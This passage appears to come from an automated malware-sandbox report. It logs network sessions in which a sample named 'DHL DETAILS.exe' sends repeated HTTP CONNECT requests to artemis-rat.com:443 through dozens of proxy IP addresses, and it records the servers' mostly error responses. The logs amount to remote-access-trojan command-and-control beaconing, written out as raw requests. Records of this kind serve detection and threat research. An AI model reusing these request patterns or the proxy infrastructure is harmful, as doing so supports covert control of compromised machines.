                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    178192.168.2.550634104.18.237.128806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.005177021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.160320997 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    179192.168.2.550529198.199.86.1131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.007589102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.098347902 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    180192.168.2.550376123.126.158.50806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.009244919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.335786104 CET536INHTTP/1.1 500 Internal Server Error
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 576
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21
                                                                                    Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page --><!
                                                                                    Mar 9, 2024 13:14:13.335818052 CET199INData Raw: 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f
                                                                                    Data Ascii: -- a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    181192.168.2.55049572.195.101.9941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.009695053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    182192.168.2.550657104.20.179.187806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.011392117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.166192055 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    183192.168.2.550633104.21.85.200806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.011646986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.167182922 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    184192.168.2.550637192.169.214.249451086352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.013592958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    185192.168.2.55051992.204.134.38258256352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.014576912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    186192.168.2.550665172.67.187.242806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.015960932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.170766115 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    187192.168.2.550668104.16.241.204806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.017282009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.173827887 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    188192.168.2.55043786.8.163.8891506352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.023124933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    189192.168.2.550555162.243.102.20797646352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.024579048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    190192.168.2.550449121.159.146.251806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.025682926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    191192.168.2.550630198.57.229.185647676352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.025949955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.504947901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.067501068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.208090067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    192192.168.2.5504693.9.71.16731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.028671026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.322750092 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    193192.168.2.55084991.231.186.1334436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.033453941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    194192.168.2.550452120.48.62.23980806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.054280043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.739304066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.067398071 CET641INHTTP/1.1 503 Service Unavailable
                                                                                    Access-Control-Allow-Credentials: true
                                                                                    Access-Control-Allow-Headers: Content-Type,AccessToken,X-CSRF-Token, Authorization, Token
                                                                                    Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE,UPDATE
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-Type
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Set-Cookie: uuid=8b1086ba-de0e-11ee-9749-fa20201ff994; Path=/; Max-Age=8640000; HttpOnly
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Length: 31
                                                                                    Data Raw: 75 6e 73 75 70 70 6f 72 74 65 64 20 70 72 6f 74 6f 63 6f 6c 20 73 63 68 65 6d 65 20 22 22 0a
                                                                                    Data Ascii: unsupported protocol scheme ""


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    195192.168.2.550619162.241.158.204317946352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.054500103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.567449093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.176884890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    196192.168.2.5504118.219.177.134156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.054739952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    197192.168.2.55085891.231.186.1334436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.055129051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    198192.168.2.55086591.231.186.1334436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.057689905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    199192.168.2.549806174.77.111.198495476352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.057697058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    200192.168.2.55086691.231.186.1334436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.058723927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    201192.168.2.55060892.204.136.149166916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.058744907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.593832016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.254981041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.677478075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.380212069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.177249908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    202192.168.2.550465148.72.209.174124466352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.069370031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
